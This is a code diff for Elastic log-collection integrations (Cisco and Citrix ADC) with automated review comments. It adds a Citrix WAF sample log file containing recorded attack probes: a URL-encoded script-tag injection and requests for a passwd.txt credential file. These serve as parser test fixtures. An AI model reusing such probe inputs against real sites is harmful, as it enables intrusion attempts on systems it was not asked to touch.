target_field: cisco_secure_email_gateway.log.esa.rate_limited_ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAReplyTo + target_field: cisco_secure_email_gateway.log.esa.reply_to + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASDRDomainAge + target_field: cisco_secure_email_gateway.log.esa.sdr_consolidated_domain_age + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASPFVerdict + target_field: cisco_secure_email_gateway.log.esa.spf_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESASenderGroup + target_field: cisco_secure_email_gateway.log.esa.sender_group + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInCipher + target_field: cisco_secure_email_gateway.log.esa.tls.in.cipher + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInConnStatus + target_field: cisco_secure_email_gateway.log.esa.tls.in.connection_status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSInProtocol + target_field: cisco_secure_email_gateway.log.esa.tls.in.protocol + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutCipher + target_field: cisco_secure_email_gateway.log.esa.tls.out.cipher + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutConnStatus + target_field: cisco_secure_email_gateway.log.esa.tls.out.connection_status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESATLSOutProtocol + target_field: cisco_secure_email_gateway.log.esa.tls.out.protocol + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAURLDetails + target_field: cisco_secure_email_gateway.log.esa.url_details + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.act + target_field: cisco_secure_email_gateway.log.act + 
ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cfp1Label + target_field: cisco_secure_email_gateway.log.cfp1_label + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.cfp1 + target_field: cisco_secure_email_gateway.log.cfp1 + type: double + if: "ctx._tmp?.fields?.cfp1 != 'None' && ctx._tmp?.fields?.cfp1 != 'not enabled'" + ignore_missing: true + on_failure: + - remove: + field: _tmp.cfp1 + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - rename: + field: _tmp.fields.cs1Label + target_field: cisco_secure_email_gateway.log.cs1_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs1 + target_field: cisco_secure_email_gateway.log.cs1 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs2Label + target_field: cisco_secure_email_gateway.log.cs2_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs2 + target_field: cisco_secure_email_gateway.log.cs2 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs3Label + target_field: cisco_secure_email_gateway.log.cs3_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs3 + target_field: cisco_secure_email_gateway.log.cs3 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs4Label + target_field: cisco_secure_email_gateway.log.cs4_label + ignore_missing: true + ignore_failure: true + - gsub: + field: _tmp.fields.cs4 + target_field: cisco_secure_email_gateway.log.cs4 + if: ctx._tmp?.fields?.cs4 != null && ctx._tmp?.fields?.cs4 != "''" + pattern: "^'<|>'$" + replacement: "" + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs5Label + target_field: cisco_secure_email_gateway.log.cs5_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs5 + target_field: cisco_secure_email_gateway.log.cs5 + 
ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs6Label + target_field: cisco_secure_email_gateway.log.cs6_label + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.cs6 + target_field: cisco_secure_email_gateway.log.cs6 + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceDirection + target_field: cisco_secure_email_gateway.log.device_direction + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceInboundInterface + target_field: cisco_secure_email_gateway.log.listener.name + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.deviceOutboundInterface + target_field: cisco_secure_email_gateway.log.listener.name + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.duser + target_field: email.to.address + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.dvc + target_field : cisco_secure_email_gateway.log.data.ip + type: ip + if: ctx._tmp?.fields?.dvc != null + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.endTime + target_field: event.end + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.end + target_field: event.end + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.sourceHostName + target_field: source.domain + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.shost + target_field: source.domain + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.sourceAddress + target_field: source.ip + if: ctx._tmp?.fields?.sourceAddress != null + type: ip + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.src + target_field: source.ip + if: ctx._tmp?.fields?.src != null + type: ip + ignore_missing: true + ignore_failure: true + - gsub: + field: _tmp.fields.msg + target_field: email.subject + if: 
ctx._tmp?.fields?.msg != null + pattern: (?:^['"]|['"]$) + replacement: "" + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.suser + target_field: email.from.address + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.startTime + target_field: event.start + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.start + target_field: event.start + ignore_missing: true + ignore_failure: true - append: field: related.ip value: '{{{cisco_secure_email_gateway.log.esa.helo.ip}}}' 
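Review bot: The `cfp1` convert processor now reads `_tmp.fields.cfp1`, but its `on_failure` handler still has `field: _tmp.cfp1`, a path carried over from the removed version, so on a failed conversion the unparsable value is left in place while the error is appended; it should be `field: _tmp.fields.cfp1`. The new kv `field_split` `(?:((\s+)?$|\s+(?=\w+=)))` cuts on any whitespace followed by `name=`, and the last extension, `msg`, holds the email subject, which is chosen by the sender rather than the gateway; a subject containing whitespace followed by `name=` text would be split into extra keys, and because the later `rename` steps move keys such as `_tmp.fields.suser` into `email.from.address` unconditionally, such keys could overwrite or be appended to the values the gateway itself reported. The replaced pattern anchored `msg=%{GREEDYDATA:_tmp.msg}$` before any splitting; extracting `msg` with grok first and running kv only on the portion before it would keep that boundary, and a pipeline test sample whose subject contains `key=value` text would pin the behaviour. The `dvc` convert also has `target_field : cisco_secure_email_gateway.log.data.ip` with a stray space before the colon, which YAML tolerates but no other processor in the file uses.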
@@ -128,50 +386,38 @@ processors: if: ctx.cisco_secure_email_gateway?.log?.device_direction == '1' ignore_failure: true - rename: - field: deviceExternalId + field: _tmp.fields.deviceExternalId target_field: host.id ignore_missing: true - rename: - field: ESAMID + field: _tmp.fields.ESAMID target_field: email.message_id ignore_missing: true ignore_failure: true - rename: - field: ESAICID + field: _tmp.fields.ESAICID target_field: cisco_secure_email_gateway.log.esa.injection_connection_id ignore_missing: true - rename: - field: ESADCID + field: _tmp.fields.ESADCID target_field: cisco_secure_email_gateway.log.esa.delivery_connection_id ignore_missing: true - rename: - field: ESAAMPVerdict + field: _tmp.fields.ESAAMPVerdict target_field: cisco_secure_email_gateway.log.esa.amp_verdict ignore_missing: true - rename: - field: ESAASVerdict + field: _tmp.fields.ESAASVerdict target_field: cisco_secure_email_gateway.log.esa.as_verdict ignore_missing: true - rename: - field: ESAAVVerdict + field: _tmp.fields.ESAAVVerdict target_field: cisco_secure_email_gateway.log.esa.av_verdict ignore_missing: true - rename: - field: ESACFVerdict + field: _tmp.fields.ESACFVerdict target_field: cisco_secure_email_gateway.log.esa.content_filter_verdict ignore_missing: true - - convert: - field: _tmp.cfp1 - target_field: cisco_secure_email_gateway.log.cfp1 - type: double - if: "ctx._tmp?.cfp1 != 'None' && ctx._tmp?.cfp1 != 'not enabled'" - ignore_missing: true - on_failure: - - remove: - field: _tmp.cfp1 - - append: - field: error.message - value: '{{{_ingest.on_failure_message}}}' - date: field: _tmp.timestamp timezone: '{{{event.timezone}}}' @@ -207,6 +453,7 @@ processors: target_field: event.start timezone: '{{{event.timezone}}}' if: ctx.event?.start != null + tag: date event.start formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy 
@@ -223,6 +470,7 @@ processors: field: event.start target_field: event.start if: ctx.event?.start != null + tag: date re-parse event.start formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -242,6 +490,7 @@ processors: target_field: event.end timezone: '{{{event.timezone}}}' if: ctx.event?.end != null + tag: date event.end formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -258,6 +507,7 @@ processors: field: event.end target_field: event.end if: ctx.event?.end != null + tag: date re-parse event.end formats: - E MMM dd HH:mm:ss yyyy - E MMM d HH:mm:ss yyyy @@ -283,4 +533,5 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: |- + Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" diff --git a/packages/cisco_secure_email_gateway/manifest.yml b/packages/cisco_secure_email_gateway/manifest.yml index 73bcde92f42..a57df751722 100644 --- a/packages/cisco_secure_email_gateway/manifest.yml +++ b/packages/cisco_secure_email_gateway/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_secure_email_gateway title: Cisco Secure Email Gateway -version: "1.22.1" +version: "1.23.2" description: Collect logs from Cisco Secure Email Gateway with Elastic Agent. type: integration categories: diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml index a4509ab8864..417fbf5c7cf 100644 --- a/packages/cisco_secure_endpoint/changelog.yml +++ b/packages/cisco_secure_endpoint/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "2.24.2" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml index 0e0cd752a44..d43f4d20890 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml +++ b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml @@ -24,6 +24,7 @@ streams: multi: false required: true show_user: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index b263c17ee6e..01c4358f0cc 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_secure_endpoint title: Cisco Secure Endpoint -version: "2.24.2" +version: "2.25.0" description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/cisco.svg title: cisco diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index cb4f3d8723e..15490463e81 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.22.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.21.2" changes: - description: Changed owners 
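Review bot: In the `cisco_secure_endpoint` `data_stream/event/manifest.yml` hunk, `secret: true` is added to a variable whose `name:` and `type:` lines are outside the hunk; in the `cisco_umbrella` stream manifest the same commit pairs `secret: true` with a change from `type: text` to `type: password`, but no such type change appears here. Confirm the variable is already declared with `type: password`, since `secret` governs how Fleet stores the value while `type: password` is what masks it in the policy editor. The `kibana.version` bump to `^8.12.0` in the package manifest is consistent with the `secret` flag's minimum version.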
diff --git a/packages/cisco_umbrella/data_stream/log/manifest.yml b/packages/cisco_umbrella/data_stream/log/manifest.yml index f4f8dda13ca..4f2663816ea 100644 --- a/packages/cisco_umbrella/data_stream/log/manifest.yml +++ b/packages/cisco_umbrella/data_stream/log/manifest.yml @@ -71,18 +71,21 @@ streams: multi: false required: false show_user: true + secret: false - name: secret_access_key - type: text + type: password title: Secret Access Key multi: false required: false show_user: true + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true + secret: true - name: role_arn type: text title: Role ARN diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index bf5fe6ec698..5351984ec13 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: cisco_umbrella title: Cisco Umbrella -version: "1.21.2" +version: "1.22.0" description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ categories: - dns_security conditions: kibana: - version: "^8.4.0" + version: "^8.12.0" icons: - src: /img/cisco.svg title: cisco diff --git a/packages/citrix_adc/_dev/build/build.yml b/packages/citrix_adc/_dev/build/build.yml index 8d9e4bf7ac8..55ea148e1b1 100644 --- a/packages/citrix_adc/_dev/build/build.yml +++ b/packages/citrix_adc/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: git@v8.4.0 + import_mappings: true diff --git a/packages/citrix_adc/_dev/build/docs/README.md b/packages/citrix_adc/_dev/build/docs/README.md index 8598f0ad860..6caacecbad7 100644 --- a/packages/citrix_adc/_dev/build/docs/README.md +++ b/packages/citrix_adc/_dev/build/docs/README.md 
@@ -4,9 +4,11 @@ The Citrix ADC integration allows you to monitor your Citrix ADC instance. Citrix ADC is an application delivery controller that performs application-specific traffic analysis to intelligently distribute, optimize, and secure Layer 4 - Layer 7 (L4–L7) network traffic for web applications. +The Citrix Web App Firewall prevents security breaches, data loss, and possible unauthorized modifications to websites that access sensitive business or customer information. It does so by filtering both requests and responses, examining them for evidence of malicious activity, and blocking requests that exhibit such activity. Your site is protected not only from common types of attacks, but also from new, as yet unknown attacks. In addition to protecting web servers and websites from unauthorized access, the Web App Firewall protects against vulnerabilities in legacy CGI code or scripts, web frameworks, web server software, and other underlying operating systems. + Use the Citrix ADC integration to: -Collect metrics related to the interface, lbvserver, service, system and vpn. +Collect metrics related to the interface, lbvserver, service, system, vpn and logs. Create visualizations to monitor, measure and analyze the usage trend and key data, and derive business insights. Create alerts to reduce the MTTD and also the MTTR by referencing relevant logs when troubleshooting an issue. 
@@ -18,12 +20,37 @@ The Citrix ADC integration collects metrics data. Metrics give you insight into the statistics of the Citrix ADC. Metrics data streams collected by the Citrix ADC integration include [interface](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/network/interface/), [lbvserver](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/lb/lbvserver/), [service](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/basic/service/), [system](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/system/system/) and [vpn](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/vpn/vpn/), so that the user could monitor and troubleshoot the performance of the Citrix ADC instances. +**Log** is used to retrieve Citrix Netscaler logs. See more details in the documentation [here](https://developer-docs.netscaler.com/en-us/netscaler-syslog-message-reference/current-release). + Note: -- Users can monitor and see the metrics inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +- Users can monitor and see the metrics and logs inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. 
+ +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. ## Compatibility -This integration has been tested against Citrix ADC `v13.0` and `v13.1`. +This integration has been tested against Citrix ADC `v13.0`, `v13.1` and `v14.1`. ## Prerequisites 
@@ -39,10 +66,41 @@ Example Host Configuration: `http://localhost:9080` For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +### Steps for configuring CEF format: + +1. Navigate to **Security** the NetScaler GUI. +2. Click **Application Firewall** node. +3. Select Change Engine Settings. +4. Enable CEF Logging. + +**Note**: It is recommended to configure the application firewall to enable CEF-formatted logs. + +### Steps for configuring Syslog format: + +The Citrix WAF GUI can be used to configure syslog servers and WAF message types to be sent to the syslog servers. Refer to [How to Send Application Firewall Messages to a Separate Syslog Server](https://support.citrix.com/article/CTX138973) and [How to Send NetScaler Application Firewall Logs to Syslog Server and NS.log](https://support.citrix.com/article/CTX211543) for details. + ## Validation After the integration is successfully configured, clicking on the Assets tab of the Citrix ADC Integration should display a list of available dashboards. Click on the dashboard available for your configured datastream. It should be populated with the required data. +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Citrix ADC +3. Click on the "Citrix ADC" integration from the search results. +4. Click on the "Add Citrix ADC" button to add the integration. +5. 
While adding the integration, if you want to collect logs via logfile, keep **Collect logs from Citrix ADC via file** toggle on and then configure following parameters: + - Paths + + or if you want to collect logs via TCP, keep **Collect logs from Citrix ADC via TCP** toggle on and then configure following parameters: + - Listen Address + - Listen Port + + or if you want to collect logs via UDP, keep **Collect logs from Citrix ADC via UDP** toggle on and and then configure following parameters: + - Listen Address + - Listen Port +6. Save the integration. + ### Troubleshooting #### Dummy values @@ -94,4 +152,12 @@ This is the `vpn` data stream. Citrix VPN is the add-on that provides full Secur {{event "vpn"}} -{{fields "vpn"}} \ No newline at end of file +{{fields "vpn"}} + +### Logs + +The `citrix_adc.log` dataset provides events from the configured syslog server. + +{{event "log"}} + +{{fields "log"}} \ No newline at end of file diff --git a/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml b/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml old mode 100755 new mode 100644 index 52d22e823ff..d65e91d367c --- a/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml +++ b/packages/citrix_adc/_dev/deploy/docker/docker-compose.yml 
@@ -13,3 +13,24 @@ services:
 - http-server
 - --addr=:8080
 - --config=/files/config.yml
+ citrix-adc-logfile:
+ image: alpine
+ volumes:
+ - ./sample_logs:/sample_logs:ro
+ - ${SERVICE_LOGS_DIR}:/var/log
+ command: /bin/sh -c "cp /sample_logs/* /var/log/"
+ citrix-adc-tls:
+ image: docker.elastic.co/observability/stream:v0.8.0
+ volumes:
+ - ./sample_logs:/sample_logs:ro
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9561 -p=tls --insecure /sample_logs/citrix-adc.log
+ citrix-adc-tcp:
+ image: docker.elastic.co/observability/stream:v0.8.0
+ volumes:
+ - ./sample_logs:/sample_logs:ro
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9560 -p=tcp /sample_logs/citrix-adc.log
+ citrix-adc-udp:
+ image: docker.elastic.co/observability/stream:v0.8.0
+ volumes:
+ - ./sample_logs:/sample_logs:ro
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9560 -p=udp /sample_logs/citrix-adc.log
diff --git a/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log b/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log
new file mode 100644
index 00000000000..4ba3239d8f3
--- /dev/null
+++ b/packages/citrix_adc/_dev/deploy/docker/sample_logs/citrix-adc.log
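Review bot: The `citrix-adc-tls` command passes `--insecure`, which by its name disables certificate verification for the TLS stream to elastic-agent:9561, and nothing in the file marks that as a test-only setting. A comment on that service, e.g. `# --insecure: skips TLS certificate verification; acceptable only in this local system-test harness`, would keep the flag from being copied into deployment guidance. The `citrix-adc-tcp` and `citrix-adc-udp` services both target elastic-agent:9560; that is presumably intentional because the transports differ, but a comment saying so would save a reader from reading it as a port clash. The `citrix-adc-logfile` service copies the entire `sample_logs` directory into `${SERVICE_LOGS_DIR}`, so any file added to that directory later is also fed to the file input; worth a note if only `citrix-adc.log` is meant to be collected.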
@@ -0,0 +1,16 @@ +Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked +Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked +Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed +Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked +June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked +June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\=def msg=Disallow Illegal URL. 
cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked +Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked +Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : default APPFW APPFW_cross-site scripting 60 0 : 175.16.199.1 616-PPE1 y/3upt2K8ySWWId3Kavbxyni7Rw0000 pr_ffc http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=12345&drinking_pref=on&text_area=%3Cscript%3E%0D%0A&loginButton=ClickToLogin&as_sfid=AAAAAAWEXcNQLlSokNmqaYF6dvfqlChNzSMsdyO9JXOJomm2vBwAMOqZIChv21EcgBc3rexIUcfm0vckKlsgoOeC_BArx1Ic4NLxxkWMtrJe4H7SOfkiv9NL7AG4juPIanTvVo%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c Cross-site script check failed for field text_area="Bad tag: script" +Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscaler.test 0-PPE-1 : SSLLOG SSL_HANDSHAKE_SUCCESS 5743593 0 : SPCBId 87630 - ClientIP 172.25.184.157 - ClientPort 19849 - VserverServiceIP 10.254.14.94 - VserverServicePort 443 - ClientVersion TLSv1.2 - CipherSuite "RC4-MD5 TLSv1.2 Non-Export 128-bit" - Session Reuse +Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 
: TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
+Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1
diff --git a/packages/citrix_adc/changelog.yml b/packages/citrix_adc/changelog.yml
index a0142d9da62..27e8c940347 100644
--- a/packages/citrix_adc/changelog.yml
+++ b/packages/citrix_adc/changelog.yml
@@ -1,4 +1,29 @@
 # newer versions go on top
+- version: "1.5.1"
+ changes:
+ - description: Update description with log collection.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9562
+- version: "1.5.0"
+ changes:
+ - description: Add support of citrix_waf connector and enhance the syslog message.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9385
+- version: "1.4.0"
+ changes:
+ - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9321
+- version: "1.3.1"
+ changes:
+ - description: Disable secrets for older stack versions due to errors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9279
+- version: "1.3.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
 - version: "1.2.0"
 changes:
 - description: Limit request tracer log count to five.
